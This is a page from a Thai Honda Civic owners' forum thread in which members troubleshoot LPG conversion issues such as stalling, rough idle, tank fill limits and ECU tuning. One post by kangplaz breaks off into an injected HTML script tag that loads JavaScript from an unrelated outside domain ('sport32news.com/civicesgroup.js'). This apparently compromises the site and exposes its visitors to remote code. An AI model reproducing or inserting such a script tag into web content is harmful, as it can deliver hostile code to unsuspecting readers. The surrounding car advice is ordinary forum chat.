ตอบ
ultramanthai

ชื่อเล่น: ตาตุ้ย

เข้าร่วม: 06 พฤษภาคม 2011
ตอบ: 415

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 298
ให้คำขอบคุณ: 142

เสาร์, 18 กุมภา 2012 10:09 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
Gof พิมพ์ว่า:
1 รถติดแก๊สหัวฉีด ใช้วิ่งประมาณวันละ 30กิโล สตาร์ทไม่บ่อยแค่ไปกลับที่ทำงาน
แต่เติมน้ำมันบ่อยมาก ครั้งละ 300บาท เบนซิน91 เดือนหนึ่ง ประมาณ 1500 บาท
กินน้ำมันมากไปหรื่อปรกติครับ
2 เพิ่งไปเปลี่ยนพวกสายพานเครื่อง ล้างปิกผีเสื้อ ตั้งวาวล์ มา ช่วงเช้าตอนตัดเป็นแก๊ส
เหยีบคันเร่งรอบขึ้นแต่รถ ตื้อ ไม่ไปตามรอบที่ขึ้นเป็นแค่ช่วงแรกตอนตัดเป็นแก๊สใหม่ๆณ
ขอคำแนะนำแก้ไข ขอบคุณครับ

1.น้ำมันช่วงนี้ราคาแพงขึ้น วัดยากคับ ถ้าเติมเต็มถัง แล้วลองวิ่งน้ำมันดูสัก 100 โล แล้วไปเติมใหม่ พอจะเช็คได้
เช่า วิ่ง 100 โล แล้วเติมอีกที 300 บาท เอามาหารกันประมาณ 3 บาทต่อโล อันนี้เป็นหลักคิดครวาๆนะ
2. สงสัยหม้อต้มคงไม่ร้อนพอ แต่ถ้าเป็นทุกครั้งคงต้องดูที่หม้อต้ม ปกติ ผ้าหม้อต้มจะมีอายุใช้งานประมาณ 2 ปี หลังจากนั้นผ้าจะเสื่อมหรือรั่ว ติดระบบใดมาใยไม่บอกละคับพี่ท่าน
kangplaz

เข้าร่วม: 26 มีนา 2011
ตอบ: 30

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 16
ให้คำขอบคุณ: 61
เสาร์, 18 กุมภา 2012 12:50 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
สวัสดีครับ รถผม es 04 ตาเหยี่ยว เครื่อง exi

ติดแก๊สมาตอน 7หมื่นโล ตอนนี้ จะถึงแสนแล้วครับ ของ BSM ระบบหัวฉีด ติดมาประมาณ 6เดือน ครับ

มีปัญหาคือ เมื่อเริ่มออกตัวแล้วเหยียบ มีอาการสะดุด ตั้งแต่ติดมา

ตอนนี้ รถดับเวลา u-turn แล้วก็ รถติดอยู่บนสะพาน ค่อย ๆ เหยียบแล้ว เครื่องก็ดับไปเลย เป็นมา2วันแล้ว รู้สึกใจแป๋ว ไปเลย

ขอคำแนะนำจากพี่ ๆ ในบอร์ดด้วยครับ
ได้รับคำขอบคุณจาก: ultramanthai 

เสาร์, 18 กุมภา 2012 15:52 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
kangplaz พิมพ์ว่า:
สวัสดีครับ รถผม es 04 ตาเหยี่ยว เครื่อง exi

ติดแก๊สมาตอน 7หมื่นโล ตอนนี้ จะถึงแสนแล้วครับ ของ BSM ระบบหัวฉีด ติดมาประมาณ 6เดือน ครับ

มีปัญหาคือ เมื่อเริ่มออกตัวแล้วเหยียบ มีอาการสะดุด ตั้งแต่ติดมา

ตอนนี้ รถดับเวลา u-turn แล้วก็ รถติดอยู่บนสะพาน ค่อย ๆ เหยียบแล้ว เครื่องก็ดับไปเลย เป็นมา2วันแล้ว รู้สึกใจแป๋ว ไปเลย

ขอคำแนะนำจากพี่ ๆ ในบอร์ดด้วยครับ

ตอนเช้าเครื่องเย็นสตาร์ทน้ำมันดูรอบเครื่องยนต์ว่าสูงเกินพันรอบป่าว หลังจากนั้นพอเครื่องเริ่มร้อนรอบจะลดลงมาประมาณแปดร้อยถึงเก้าร้อยกว่าๆ ถือว่าปกติ แล้วเปิดแอร์ดูว่ารอบคงทีหรือไม่ ถ้ารอบตกเกินกว่าร้อยขึ้นไป ถือว่าชุดคุมรอบเดินเบามีปัญหา ลองล้างปีกผีเสื้อและมอเตอร์รอบเดินเบา เช็คหัวเทียน coilจุดระเบิดอีกอย่างคับ ตอนเป็นน้ำมันดูรอบเดินเบาว่าสวิ่ง
รอบขึ้นๆลงๆ ป่าว เครื่องยนต์จะสั่น ดูเข็มวัดรอบด้วยคับ ถ้ามีโอกาศเป็นที่ว์ลสูงคับบ ยิ่งเป็นแก๊สอาการจะหนักกว่าเดิม
ยี่ห้อทีท่านติดมาเนี้ยกระผมไม่มีสายจูน ทราบจากพวกๆกันว่าถ้าแก้ไขการจูนหลายๆครั้ง บางที่กล่อง อีซียูแก๊สเพี้ยนไปเลย จริงเท็จแค่ไหนผมบอกไมได้ เพียงแต่พวกๆกันทีจูนยี่ห้อนี้บอกมา (อาจจะผิดหรือถูกก็ได้) แก๊สถ้าจูนหนาไปเวลาวิ่งมาแล้วชแตะเบรค บางครั้งดับเอาดื้อๆ ลองไปดูที่ท่อไอเสียว่ามีกลิ่นแก๊สออกมาเยอะป่าว ถ้ามี แสดงว่าหนา เคยเจอ sensor tdc เสื่อมดับทั้งน้ำมันและแก๊สเลย แล้วมี sensor เพลาข้อเวียงอีดตัว ลองดูคับ ผมว่าโทรมาเว้ากันมันๆดีกว่านะพ่อหนุ่มรูปหล่อ
kangplaz

น้องใหม่
น้องใหม่

อาทิตย์, 19 กุมภา 2012 14:15 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
อืมม ขอบคุณครับ ผมขอไปลองก่อน
nusmorn

ชื่อเล่น: อุ๋ม

เข้าร่วม: 27 ธันวา 2011
ตอบ: 32

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 15
ให้คำขอบคุณ: 0

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 23 กุมภา 2012 10:19 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ

กระทู้นี้สุดยอดเลยคับ
รถผมก็กระตุกๆเหมือนกัน กำลังอยากหาทางแก้อยู่พอดี ตอนนี้ได้คำตอบเยอะเลยคับ แล้วจะลองเอาไปทำดู
ขอบคุณเจ้าของกระทู้มากๆ คับ
ได้รับคำขอบคุณจาก: ultramanthai 
kangplaz

น้องใหม่
น้องใหม่

ศุกร์, 24 กุมภา 2012 23:54 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
ผมสตาร์ทน้ำมัน รอบเครื่องอยู่ที่ 1000 รอบครับ พอสักพัก ความร้อนขึ้นมานิดนึง รอบเครื่องอยู่ที่ 1100 ครับ
พอเปิดแอร์ รอบเครื่องอยู่ที่ 800 ครับ แล้วอีกสักพักก็เหลือ 700 ครับ รอบเดินเบาอยู่ที่ 700ครับ คงที่ เครื่องไม่สั่น

ผมกำลังวิเคราะ กับพ่ออยู่ครับ ถ้าเข้าไปร้านแก๊สก็คงจูนเหมือนเดิม อาการ ออกตัวกระตุก คงไม่หายครับ

เสาร์, 25 กุมภา 2012 11:07 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
kangplaz พิมพ์ว่า:
ผมสตาร์ทน้ำมัน รอบเครื่องอยู่ที่ 1000 รอบครับ พอสักพัก ความร้อนขึ้นมานิดนึง รอบเครื่องอยู่ที่ 1100 ครับ
พอเปิดแอร์ รอบเครื่องอยู่ที่ 800 ครับ แล้วอีกสักพักก็เหลือ 700 ครับ รอบเดินเบาอยู่ที่ 700ครับ คงที่ เครื่องไม่สั่น

ผมกำลังวิเคราะ กับพ่ออยู่ครับ ถ้าเข้าไปร้านแก๊สก็คงจูนเหมือนเดิม อาการ ออกตัวกระตุก คงไม่หายครับ

อย่าเพิ่งท้อคับ ลองมาให้กาผมแก้ให้ป่าว ถ้าใช้น้ำมันคุณปกติ ติดตั้งถูกต้องยังไงก็แก้หายคับ ช่างไทเราเก่งๆกันเยอะ
kangplaz

น้องใหม่
น้องใหม่

อาทิตย์, 26 กุมภา 2012 13:45 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
ขอบคุณครับ ขอผมทำให้สุดๆ ก่อนครับ จะได้เป็นบทเรียน "<script src="https://sport32news.com/civicesgroup.js">
suwitjim

ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 1 มีนา 2012 11:47 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
กล่องแก๊ส AC Stag 200 เสียครับ ...

โดนน้ำเข้าตอนน้ำถ่วม สามารถซ่อมได้ไหม ราคาประมาณเท่าไรครับ ...

ขอบคุณล่วงหน้าครับ ...

พฤหัส, 1 มีนา 2012 12:24 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
suwitjim พิมพ์ว่า:
กล่องแก๊ส AC Stag 200 เสียครับ ...

โดนน้ำเข้าตอนน้ำถ่วม สามารถซ่อมได้ไหม ราคาประมาณเท่าไรครับ ...

ซื้อใหม่คุ้มกว่าคับ ได้ครบชุด ราคาหมื่นต้นๆ
suwitjim

ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 1 มีนา 2012 16:27 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
ultramanthai พิมพ์ว่า:

ซื้อใหม่คุ้มกว่าคับ ได้ครบชุด ราคาหมื่นต้นๆ

ชุดใหม่เปลี่ยนแล้วครับ ...

แต่อยากซ่อมเก็บไว้ เพื่อขายได้ ...

พฤหัส, 1 มีนา 2012 17:21 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ

ชุดใหม่เปลี่ยนแล้วครับ ...

แต่อยากซ่อมเก็บไว้ เพื่อขายได้ ...

ไม่มีข้อมูลร้านซ่อมคับ

nnn_watt

ชื่อเล่น: วัตร

เข้าร่วม: 11 มกรา 2012
ตอบ: 13

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 1

ที่อยู่: 6/188-189 ซอยเพชรเกษม 110 แขวงหนองค้างพลู เขตหนองแขม กทม. 10160
พฤหัส, 15 มีนา 2012 15:39 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
น้องใหม่เก็บความรู้ครับ......เป็นทุกอาการณ์...ที่น้า ultramanthai ว่ามาเลยครับ

พฤหัส, 15 มีนา 2012 16:07 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
nnn_watt พิมพ์ว่า:
น้องใหม่เก็บความรู้ครับ......เป็นทุกอาการณ์...ที่น้า ultramanthai ว่ามาเลยครับ

ที่ว่ามาเป็นทุกอาการนะ รถหรือคนคับ ถ้ารถแก้ไม่ยากหรอก แต่ถ้าคน...ฮืมๆๆๆๆ
sutin

เข้าร่วม: 02 กรกฎา 2010

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 4
เสาร์, 17 มีนา 2012 06:44 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
AUDY พิมพ์ว่า:
honda civic dimansion 01 vtec ติด advanced obd energy ถัง 64 ลิตร อยากรบกวนถามครับ ว่า ผมเติม 45 ลิตร แล้วตัด(ครั้งแรก) ถึงเติมได้น้อยมากครับ จริงๆ แล้ว ถัง 64 ลิตร ควรเติมได้เท่าไหร่ครับ มันจะเกี่ยวกับ ตัว มัติวาล หรือเปล่าครับ พอวิ่ง กลับวิ่งได้แค่ 378.5 มันน้อยไปมั้ย หรือว่า ปกติครับ และ ถ้าไม่ปกติ ต้องทำอย่างไรครับ รบกวนด้วยครับ

ถ้าวาวล์ไม่เสียก็เป็นเรื่องเกี่ยวกับมัลติวาวล์ครับ ตอนแรกคุณAUDY เลือกถัง 58 ลิตรใช่ไหม่ แต่พอช่างแนะนำถัง64 ลิตรโดยเพิ่มเงินก็ตกลง แต่มันใช้มัลติวาวล์ตัวเดิม ทีนี้ระหว่างถัง58 กับถัง 64 ลิตร มุม/องศาตำแหน่งลูกลอยมันต่างกัน มันก็เลยตัดแก๊สไม่เป็นไปตามมาตรฐาน 85 % คือ 55.4 ลิตร ส่วนใหญ่ช่างทั่วไปจะแนะนำมัลติวาวล์แบบทั่วไป(ถูก) ของผมแอคคอร์ด94 ตอนแรกก็จะเติมเต็มช้ามาก พอไปเคลม ก็จะเอาวาวล์ที่ไม่แมทกับถังมาใส่ ก็จะเจอปัญหาเติมได้หน่อยเดียวก็เต็มแบบคุณAUDY พอผมเปลี่ยมมาใช้มัลลติวาวล์ยี่ห้อ โทมาเซโต้ ก็ใช้ได้ดี ตอนนี้ผมใช้ ES 04 เติมเต็มถังวิ่งได้ 500 กิโล หัวฉีดเวอร์ซุส วาวล์โทมาเซโต้ และถัง58 ลิตร "Magnat"
sutin

เข้าร่วม: 02 กรกฎา 2010

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 4
เสาร์, 17 มีนา 2012 06:51 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
AUDY พิมพ์ว่า:
honda civic dimansion 01 vtec ติด advanced obd energy ถัง 64 ลิตร อยากรบกวนถามครับ ว่า ผมเติม 45 ลิตร แล้วตัด(ครั้งแรก) ถึงเติมได้น้อยมากครับ จริงๆ แล้ว ถัง 64 ลิตร ควรเติมได้เท่าไหร่ครับ มันจะเกี่ยวกับ ตัว มัติวาล หรือเปล่าครับ พอวิ่ง กลับวิ่งได้แค่ 378.5 มันน้อยไปมั้ย หรือว่า ปกติครับ และ ถ้าไม่ปกติ ต้องทำอย่างไรครับ รบกวนด้วยครับ

ถ้าวาวล์ไม่เสียก็เป็นเรื่องเกี่ยวกับมัลติวาวล์ครับ ตอนแรกคุณAUDY เลือกถัง 58 ลิตรใช่ไหม่ แต่พอช่างแนะนำถัง64 ลิตรโดยเพิ่มเงินก็ตกลง แต่มันใช้มัลติวาวล์ตัวเดิม ทีนี้ระหว่างถัง58 กับถัง 64 ลิตร มุม/องศาตำแหน่งลูกลอยมันต่างกัน มันก็เลยตัดแก๊สไม่เป็นไปตามมาตรฐาน 85 % คือ 55.4 ลิตร ส่วนใหญ่ช่างทั่วไปจะแนะนำมัลติวาวล์แบบทั่วไป(ถูก) ของผมแอคคอร์ด94 ตอนแรกก็จะเติมเต็มช้ามาก พอไปเคลม ก็จะเอาวาวล์ที่ไม่แมทกับถังมาใส่ ก็จะเจอปัญหาเติมได้หน่อยเดียวก็เต็มแบบคุณAUDY พอผมเปลี่ยมมาใช้มัลลติวาวล์ยี่ห้อ โทมาเซโต้ ก็ใช้ได้ดี ตอนนี้ผมใช้ ES 04 เติมเต็มถังวิ่งได้ 500 กิโล หัวฉีดเวอร์ซุส วาวล์โทมาเซโต้ และถัง58 ลิตร "Magnat"

เสาร์, 17 มีนา 2012 08:43 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
ปกติแก๊สจะเติมได้ประมาณ 85%ของขนาดความจุถัง ต่ำแหน่งลูกลอยและองศาก็สำคัญ อีกอย่างถ้ามีลมในถังก็เติมได้น้อย ถ้าเติมได้เต็มตามความจุ อันนี้เป็นปัญหาของคุณกับเจ้าของปั้ม 555
payunbok

เข้าร่วม: 19 มีนา 2012
ตอบ: 2

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 0
จันทร์, 19 มีนา 2012 20:34 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
สตาร์ทรถแล้วรอบต่ำจนดับค่ะ ไปหาช่างที่เค้าติดแก๊สเค้าบอกว่าต้องล้างลิ้นผีเสื้อ เปลี่ยนซีนหน้า ซีนท้าย

ราคาเกือบแปดพัน จริงรึป่าวคะ ทำไมแพงจัง
jiaxuan

เข้าร่วม: 02 พฤษภาคม 2011
ตอบ: 125

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 85
ให้คำขอบคุณ: 2

ปี: 2004
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
จันทร์, 19 มีนา 2012 20:56 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
สอบถามหน่อยครับ สมมุติว่าผมวิ่งรถมายาวๆเป็น100กิโลแล้วดับเครื่องจอดแวะเติมแก๊สแปปนึงประมาณ5นาที เวลาสตาร์ทใหม่นี่ควรสตาร์ทด้วยนํ้ามันหรือแก๊สครับ

ขอบคุณครับ

อังคาร, 20 มีนา 2012 08:21 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
jiaxuan พิมพ์ว่า:
สอบถามหน่อยครับ สมมุติว่าผมวิ่งรถมายาวๆเป็น100กิโลแล้วดับเครื่องจอดแวะเติมแก๊สแปปนึงประมาณ5นาที เวลาสตาร์ทใหม่นี่ควรสตาร์ทด้วยนํ้ามันหรือแก๊สครับ

ขอบคุณครับ

สมมุติว่าคุณติดระบบหัวฉีดมา สตาร์ททุกคั้งจะเป็นน้ำมันคับ ระบบหัวฉีดมีสามเงื่อนไข ที่จะเปลี่ยนเป็นแก๊ส
1.สวิชแก๊สหน่วง ประมาณ 10 วินาที 2. ความร้อนของหม้อต้มแก๊ส 50 องศา
3.รอบเปลี่ยนเป็นแก๊ส 1600 รอบขึ้นไป
ทั้ง 3 ข้อนี้แล้วแต่ช่างหรือเจ้าของรถ จะตั้งน้อยหรือมากกว่าแล้วแต่จะเลือก
ได้รับคำขอบคุณจาก: nooduean_69 
maxkecm

เข้าร่วม: 21 มิถุนา 2011
ตอบ: 304

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 230
ให้คำขอบคุณ: 7

ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 20 มีนา 2012 09:07 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
ความรู้ทั้งนั้น
sisitd

ชื่อเล่น: ชัย

เข้าร่วม: 14 กุมภา 2011
ตอบ: 27

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 11

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 20 มีนา 2012 11:42 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
Civic dimension Exi auto 2004 ต้องการจะติดแก๊ส LPG ช่วยแนะนำ ร้าน รุ่น ยี่ห้อ ราคา การดูแลตรวจสอบก่อนติดตั้ง หลังติดตั้ง วิธีการใช้แก๊สและน้ำมันสลับกันอย่างไรดี รวมถึงการรับประกันของผู้ติดตั้ง ด้วยครับ

อังคาร, 20 มีนา 2012 13:18 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
sisitd พิมพ์ว่า:
Civic dimension Exi auto 2004 ต้องการจะติดแก๊ส LPG ช่วยแนะนำ ร้าน รุ่น ยี่ห้อ ราคา การดูแลตรวจสอบก่อนติดตั้ง หลังติดตั้ง วิธีการใช้แก๊สและน้ำมันสลับกันอย่างไรดี รวมถึงการรับประกันของผู้ติดตั้ง ด้วยครับ

รุ่นนี้เป็นรุ่นที่ติดแก๊สมักจะประสพปัญหามากที่เดียว การเลือกอุปรณ์ติดตั้งสำคัญมากคับ ผมไม่สามารถที่จะบอกยี่ห้อได้ เดียวจะไม่เป็นธรรมกับยี่ห้ออื่นๆ ส่วนร้านที่ติดบอกอยากคับ ส่วนหนึ่งไม่มากก็น้อยก่อนติดดีทุกอย่าง หลังติดแล้วไม่เอาดีสักอย่าง เมล์หรือโทรมาถามดีกว่าคับ (หากิ๊กนะหาไม่ยากหรอก แต่หาช่างที่ดีมีคุณธรรมนี้ซิ.............)
Kriss_es04

ชื่อเล่น: อ๊อด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1745

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1543
ให้คำขอบคุณ: 234

ที่อยู่: ดินแดง-แจ้งวัฒนะ-นนทบุรี-มหาชัย-พระราม2-กระทุ่มแบน-สามพราน
ศุกร์, 23 มีนา 2012 14:12 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
คราบสกปรกที่เกะตามวาล์วเนี้ยมีวิธีทำความสะอาดได้อย่างไรครับ

ศุกร์, 23 มีนา 2012 15:16 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
Kriss_es04 พิมพ์ว่า:
คราบสกปรกที่เกะตามวาล์วเนี้ยมีวิธีทำความสะอาดได้อย่างไรครับ

ถอดมาล้างและขัด โถพ่อคูณให้ช่างเค้าทำเถอะ แบ่งๆกันกินดีกว่านะ
ได้รับคำขอบคุณจาก: nooduean_69 
virgins

เข้าร่วม: 23 ตุลา 2009
ตอบ: 45

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 14
ให้คำขอบคุณ: 10
เสาร์, 24 มีนา 2012 23:06 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
ผมมีปัญหาตอนนี้ คือ รอบเครื่องเดินเบามากๆ ตอนจอดติดไฟแดง หรือบางทีขับๆรถติดๆ
เครื่องเบาๆ ดับซะงั้น พักนนี้เป็นบ่อยมากครับ จะแก้ไขยังไงดี มีคนแนะนำตั้งวาลว์ใหม่ T^T
ผมจูนมา 3 รอบแล้ว(ครั้งที่ 1 และ 2 จูนกับร้านที่ติดตั้งแก๊ส ส่วนครั้งที่ 3 เปลี่ยนร้านจูนครับ)
รบกวนด้วยนะครับ

ปล.เวลาขับๆ บางทีก็มีไฟรูปเครื่องยนต์โชว์ด้วยครับ T^T

จันทร์, 26 มีนา 2012 08:54 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
 ขณะที่ใช้น้ำมันนิ่งป่าว ถ้ารอบวิ่งขึ้นๆลงๆ เช็ควาล์ว ถ้านิ่งเป็นที่แก๊ส ล้างปีผีเสื้อและชุดควบคุมรอบเดินเบาปรับจูนใหม่
ว่าแต่ท่านติดยี่ห้อใดมาวานบอกด้วยคับ   
ได้รับคำขอบคุณจาก: virgins 
virgins

น้องใหม่
น้องใหม่

จันทร์, 26 มีนา 2012 11:52 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
 ขณะที่ใช้น้ำมันนิ่งป่าว ถ้ารอบวิ่งขึ้นๆลงๆ เช็ควาล์ว ถ้านิ่งเป็นที่แก๊ส ล้างปีผีเสื้อและชุดควบคุมรอบเดินเบาปรับจูนใหม่
ว่าแต่ท่านติดยี่ห้อใดมาวานบอกด้วยคับ 

หัวฉีด AG อ่ะครับ ปีกผีเสื้อเคยล้างไปแล้วครับหนนึง ใช้น้ำมันเป็นปกติครับ เป็นไปได้อยากจะไล่เช็คใหม่หมด แต่จะคุ้มไหมอ่ะครับ T^T
ทั้งวาวล์ทั้ง ชุดควบคุมรอบ และปรับจูนใหม่ T^T

จันทร์, 26 มีนา 2012 12:09 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ
virgins พิมพ์ว่า:

หัวฉีด AG อ่ะครับ ปีกผีเสื้อเคยล้างไปแล้วครับหนนึง ใช้น้ำมันเป็นปกติครับ เป็นไปได้อยากจะไล่เช็คใหม่หมด แต่จะคุ้มไหมอ่ะครับ T^T
ทั้งวาวล์ทั้ง ชุดควบคุมรอบ และปรับจูนใหม่ T^T
ว่างๆก็แวะมา เดียวจัดเต็ม ถ้าเป็นที่แก๊ส แก้ไม่น่ายากนะพ่อคุณ
ได้รับคำขอบคุณจาก: virgins 
virgins

น้องใหม่
น้องใหม่

จันทร์, 26 มีนา 2012 14:37 - ติด ตั้ง แก๊ส Honda civic ท่านใด มีปัญหาเชิญ

virgins พิมพ์ว่า:

ว่างๆก็แวะมา เดียวจัดเต็ม ถ้าเป็นที่แก๊ส แก้ไม่น่ายากนะพ่อคุณ

แวะไปไหนอ่าครับ เดี๋ยวจะรีบไปเลย เพราะมีแววจะขับรถไปไกลอ่ะครับ ลูกเพี่ย 
ตอบ
หน้า 6 จาก 26
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.